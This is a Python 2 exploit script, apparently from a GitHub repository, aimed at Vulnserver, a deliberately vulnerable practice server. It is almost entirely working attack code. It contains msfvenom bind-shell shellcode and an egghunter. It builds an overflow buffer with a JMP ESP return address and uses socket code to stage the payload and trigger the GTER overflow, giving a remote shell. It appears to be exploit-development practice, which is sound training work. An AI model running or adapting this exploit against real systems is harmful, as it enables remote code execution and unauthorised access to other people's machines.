python/vulnserver-bindshell.py at master · puckiestyle/python · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
#!/usr/bin/python

import os
import sys
import socket

host = "192.168.1.59"
port = 9999

#https://captmeelo.com/exploitdev/osceprep/2018/06/28/vulnserver-gter.html
# msfvenom -p windows/shell_bind_tcp EXITFUNC=thread -b "\x00" -f c
# Payload size: 355 bytes
shellcode = ("\xdb\xd8\xd9\x74\x24\xf4\x5a\x29\xc9\xbf\xd1\x60\x90\xf9\xb1"
"\x53\x83\xea\xfc\x31\x7a\x13\x03\xab\x73\x72\x0c\xb7\x9c\xf0"
"\xef\x47\x5d\x95\x66\xa2\x6c\x95\x1d\xa7\xdf\x25\x55\xe5\xd3"
"\xce\x3b\x1d\x67\xa2\x93\x12\xc0\x09\xc2\x1d\xd1\x22\x36\x3c"
"\x51\x39\x6b\x9e\x68\xf2\x7e\xdf\xad\xef\x73\x8d\x66\x7b\x21"
"\x21\x02\x31\xfa\xca\x58\xd7\x7a\x2f\x28\xd6\xab\xfe\x22\x81"
"\x6b\x01\xe6\xb9\x25\x19\xeb\x84\xfc\x92\xdf\x73\xff\x72\x2e"
"\x7b\xac\xbb\x9e\x8e\xac\xfc\x19\x71\xdb\xf4\x59\x0c\xdc\xc3"
"\x20\xca\x69\xd7\x83\x99\xca\x33\x35\x4d\x8c\xb0\x39\x3a\xda"
"\x9e\x5d\xbd\x0f\x95\x5a\x36\xae\x79\xeb\x0c\x95\x5d\xb7\xd7"
"\xb4\xc4\x1d\xb9\xc9\x16\xfe\x66\x6c\x5d\x13\x72\x1d\x3c\x7c"
"\xb7\x2c\xbe\x7c\xdf\x27\xcd\x4e\x40\x9c\x59\xe3\x09\x3a\x9e"
"\x04\x20\xfa\x30\xfb\xcb\xfb\x19\x38\x9f\xab\x31\xe9\xa0\x27"
"\xc1\x16\x75\xdd\xc9\xb1\x26\xc0\x34\x01\x97\x44\x96\xea\xfd"
"\x4a\xc9\x0b\xfe\x80\x62\xa3\x03\x2b\x9d\x68\x8d\xcd\xf7\x80"
"\xdb\x46\x6f\x63\x38\x5f\x08\x9c\x6a\xf7\xbe\xd5\x7c\xc0\xc1"
"\xe5\xaa\x66\x55\x6e\xb9\xb2\x44\x71\x94\x92\x11\xe6\x62\x73"
"\x50\x96\x73\x5e\x02\x3b\xe1\x05\xd2\x32\x1a\x92\x85\x13\xec"
"\xeb\x43\x8e\x57\x42\x71\x53\x01\xad\x31\x88\xf2\x30\xb8\x5d"
"\x4e\x17\xaa\x9b\x4f\x13\x9e\x73\x06\xcd\x48\x32\xf0\xbf\x22"
"\xec\xaf\x69\xa2\x69\x9c\xa9\xb4\x75\xc9\x5f\x58\xc7\xa4\x19"
"\x67\xe8\x20\xae\x10\x14\xd1\x51\xcb\x9c\xf1\xb3\xd9\xe8\x99"
"\x6d\x88\x50\xc4\x8d\x67\x96\xf1\x0d\x8d\x67\x06\x0d\xe4\x62"
"\x42\x89\x15\x1f\xdb\x7c\x19\x8c\xdc\x54")

# tag = Capt
# 32 bytes
egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
"\xef\xb8\x43\x61\x70\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")

buffer = egghunter
buffer += "A"*(147-len(buffer))
buffer += "\xAF\x11\x50\x62"        # JMP ESP 625011AF from essfunc.dll
buffer += "\xe9\x64\xff\xff\xff"    # JMP 151 bytes backwards to the start of A's
buffer += "C"*(5000-len(buffer))

# For loop to send the 2nd stage shellcode using the available commands
for command in ["STATS ", "RTIME ", "LTIME ", "SRUN ", "TRUN ", "GMON ", "GDOG ", "HTER ", "LTER ", "KSTAN "]:
    print "[*]Attempting to store shellcode in " + (command) + " command."
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host,port))
    print s.recv(1024)
    shell = command + "CaptCapt" + shellcode
    s.send(shell)
    print s.recv(1024)
    s.close()

# Used to send the 1st stage shellcode
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
print s.recv(1024)
print "[*] Sending exploit..."
s.send("GTER /.:/" + buffer)
print s.recv(1024)
s.close()